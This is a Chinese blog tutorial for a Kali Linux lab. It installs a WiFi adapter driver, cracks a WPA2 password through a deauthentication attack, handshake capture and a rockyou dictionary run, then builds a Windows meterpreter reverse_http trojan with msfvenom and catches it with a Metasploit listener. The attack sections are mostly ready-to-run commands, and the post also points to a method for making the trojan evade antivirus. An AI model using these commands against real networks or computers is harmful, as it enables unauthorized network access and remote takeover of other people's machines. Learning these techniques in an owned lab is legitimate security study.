使用kali进行WiFi破解

使用kali进行WiFi破解

环境准备

前置理论

⽬前最常⻅的⽆线⽹络认证⽅式: WPA-PSK(WPA-personal)使⽤TKIP WPA2-PSK(WPA2-personal)使⽤CCMP

认证原理: 在开放系统认证的基础上,加上802.11i的四次握⼿过程以更新共享密钥。 如果出现密码错误,则四次握⼿就⽆法通过。

[比较详细的破解原理](Wifi加密方式及其破解简单原理 - 假程序猿 - 博客园 (cnblogs.com))

破解原理(通俗):

  1. 需要先在⽆线⽹卡监听模式下搜集⽬标WiFi的信息,例如ssid(WiFi名称)、BSSID(也就是⽬标WiFi⽆线路由器的MAC)、已连接的客户端mac、信号强度等信息。
  2. 发送伪造的取消关联的数据包迫使已连接到该WiFi的客户端与WiFi断开连接,重点是,断开连接后,客户端会重新尝试发起连接到该WiFi⽹络,这时客户端会发送⼀个带有认证密码的数据包以便请求重新连⼊WiFi,这个包俗称为握⼿包。
  3. 攻击机利⽤攻击程序和⽆线⽹卡监听抓取到这个握⼿包,这个握⼿包⾥就含有WiFi密码,但这个密码当然是经过加密的,所以后续就需要使⽤攻击程序调⽤密码字典结合获取到的BSSID、客户端MAC等信息进⾏运算,不断运算字典中的每⼀个密码,直到有⼀个密码使⽤wpa算法能算出⼀个与抓到的握⼿包中⼀致的加密字串,这个就是⽬标WiFi的密码了。如果把字典⾥的每⼀个密码都算过⼀遍仍然没有⼀个与抓取到的握⼿包加密字串⼀致的,就破解失败,退出,构造新的字典再试。

网卡驱动安装(以下过程全部建议在root权限下进行

以下所有sudo是为了防止有人没有用root终端,root终端复制时不用特意省掉sudo,在root下使用sudo不需要输入密码。

PS:强烈建议一下每步按顺序做,不然可能会发生意料之外的错误,此时我建议把这个系统卸了重装

第一步:打开终端(点红色这个,是root权限的终端)

![屏幕截图 2023-05-16 193939](屏幕截图 2023-05-16 193939.png)

进入需要密码,密码是kali

cd /home/kali/Desktop 		#来到桌面
mkdir headers		#创建此文件夹用于存储下载Linux Headers
cd headers
sudo apt-get update		#先更新一下镜像源
sudo apt install gcc g++ build-essential git dkms	#安装dkms

如果搜索不到,可以换一下源

vim /etc/apt/sources.list

按一下i键,进入输入模式,把下面这段代码复制进去

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

然后输入:wq,回车。

第二步,安装headers

如果你用的自己下的kali,可以先试试这个自动安装命令,失败的话参考[这篇博客]((338条消息) Kali Linux 安装 COMFAST CF-WU925A Realtek RTL8811CU/RTL8821CU USB 无线网卡驱动_rtl8821cu驱动_ZXF-BW的博客-CSDN博客),以及下面过程,自行研究,使用本人提供的kali的话就直接按下面的装吧。

sudo apt-get update -y && sudo apt-get upgrade -y

通过wget下载linux headers手动安装

sudo apt-get install wget		#先安装下载工具wget

下载并安装 ,必须按顺序(安装1是安装2的前提)

1.common

wget http://http.kali.org/pool/main/l/linux/linux-headers-6.1.0-kali5-common_6.1.12-1kali2_all.deb
dpkg -i linux-headers-6.1.0-kali5-common_6.1.12-1kali2_all.deb 

2.linux-headers

wget http://http.kali.org/pool/main/l/linux/linux-headers-6.1.0-kali5-amd64_6.1.12-1kali2_amd64.deb
dpkg -i linux-headers-6.1.0-kali5-amd64_6.1.12-1kali2_amd64.deb  

第三步,下载驱动

[参考博客]((338条消息) 2020最新kali安装无线网卡【COMFAST CF-812AC】Realtek RTL8812BU或88X2BU版本驱动(超详细!!!)_realtek8812bu驱动安装_陈健平的博客-CSDN博客)

cd /home/kali/Desktop 		#再次回到桌面
git clone https://github.com/cilynx/rtl88x2bu.git		#下载驱动
cd rtl88x2bu 		#进入驱动文件目录
apt-get install bc 		#安装bc,不安装后面构建无线网卡模块会失败
VER=$(sed -n 's/\PACKAGE_VERSION="\(.*\)"/\1/p' dkms.conf)		#将无线网卡的版本号存入到VER变量中
sudo rsync -rvhP ./ /usr/src/rtl88x2bu-${VER}		#备份对应无线驱动到指定文件夹
sudo dkms add -m rtl88x2bu -v ${VER}		#添加对应的无线驱动模块
sudo dkms build -m rtl88x2bu -v ${VER}		#构建无线网卡模块,不装Linux-headers和bc会导致这一步失败
sudo dkms install -m rtl88x2bu -v ${VER}	#安装构建的无线网卡模块
sudo modprobe 88x2bu		#加载网卡

![屏幕截图 2023-05-16 203609](屏幕截图 2023-05-16 203609.png)

如果这个是暗的就点一下,把它连接到我们现在使用的kali虚拟机

![屏幕截图 2023-05-16 204340](屏幕截图 2023-05-16 204340.png)

这个是正常情况。

iwconfig		#查看是否能检测到无线网卡,不能的话可以等个半分钟再看看

![屏幕截图 2023-05-16 204519](屏幕截图 2023-05-16 204519.png)

出现wlan0即代表安装成功。

破解流程

PS:不要用苹果开热点,苹果的安全认证上WPA3,aircrack-ng破解不了

设置网卡为监听模式

iwconfig 	#查看网卡名称,一般是wlan0
airmon-ng check	kill		#有时候在后面步骤里遇到interface down这种问题,就是有进程干扰了监听
可以先用这个命令杀一下干扰进程
airmon-ng start wlan0	#设置网卡为监听模式。
iwconfig 	#有的人会显示wlan0变成了wlan0mon,有的人还是显示wlan0,只要上一步成功,名字不同不影响实验,使用对应名称即可

扫描附近WiFi

airodump-ng wlan0mon	#扫描附近WiFi,
  • BSSID代表路由器的MAC地址
  • PWR代表信号的强度,数值越大代表信息越强
  • CH代表信道
  • ENC代表用的加密的方式
  • AUTH代表认证的方式
  • ESSID是WiFi的名字

选定一个路由器,并监听其流量:

cd /home/kali/Desktop 		#回到桌面
airodump-ng -w zc -c 11 --bssid D2:26:05:9A:38:CF wlan0mon #-w 参数指定生成的文件名,-c 指定信道 --bssid指定路由器的MAC地址

选定连接此WiFi的一个客户端,进行攻击

重新打开一个命令行窗口,用于攻击,之前的窗口保留,用于观察是否抓包成功。

cd /home/kali/Desktop		#回到桌面
aireplay-ng -0 50 -a D2:26:05:9A:38:CF -c 62:CF:F5:2D:68:82 wlan0mon		#50指发包的数量,-a指定路由器的MAC地址,-c指定连接的客户端的MAC地址(可从监听端口查看)

该命令会打断连接客户端和WIFI之间的连接,等到客户端重新连接WIFI的时候,就会抓取他们之间的握手认证包!

Screenshot_2023-05-14_22-03-12

出现红框中的字符时,即抓包成功。

对抓取到的cap包进行破解

这需要我们准备好破解的密码字典。所以,无论是任何破解,都需要一个强大的密码字典!

kali下自带有一份无线密码字典——> /usr/share/wordlists/rockyou.txt.gz ,

gzip -d /usr/share/wordlists/rockyou.txt.gz
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b D2:26:05:9A:38:CF zc-03.cap 		#-w指定密码字典 -b 指定路由器的MAC地址

Screenshot_2023-05-14_22-02-38

[图文参考]((338条消息) Aircrack-ng破解无线WIFI密码_谢公子的博客-CSDN博客)

木马监听

使用msf生成木马

简介

Metasploit就是⼀个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是⼀个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

查看本机ip地址

ifconfig		#kali中使用
ipconfig		#win中使用

测试能否ping通

ping 192.168.195.131		#win尝试ping一下kali
ping 192.168.195.135 -c 4	#kali尝试ping一下win,-c指发包数		

如果第一步成功而第二步失败,可能是因为win的防火墙在阻拦,建议关掉,不然做不了。

生成一个普通win平台的木马(不免杀,建议关掉防火墙,杀毒软件和实时扫描之类的)

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.195.131 lport=3333 -f exe>/home/kali/Desktop/zc.exe 		# -p 指定攻击载荷,LHOST是攻击者(窃听者ip地址),lport是监听端口,-f 指定输出格式

此处制造的木马不免杀,如何制作免杀木马可以参考此博客MSF制作免杀木马 - 迷途小書童~ - 博客园

msf进行线上监听

msfconsole		#开启msf
use exploit/multi/handler		#使用exploit(攻击模块)的multi,handler模块
set lhost 192.168.195.131		#设置攻击者ip
set lport 3333					#设置监听端口
set payload windows/meterpreter/reverse_http		#设置http监听
options							#确认设置是否正确
run								#开始监听

此时切到另一个可以ping通的win虚拟机,(此处建议把实时扫描,杀毒软件,防火墙都关了,不然木马会被立刻发现并清理),以管理员身份运行木马,

![屏幕截图 2023-05-15 023645](屏幕截图 2023-05-15 023645.png)

监听成功!

参考博客1

[参考博客2]((338条消息) MSF生成木马及木马的简单使用-CSDN博客)

posted @   木の舟  阅读(4703)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示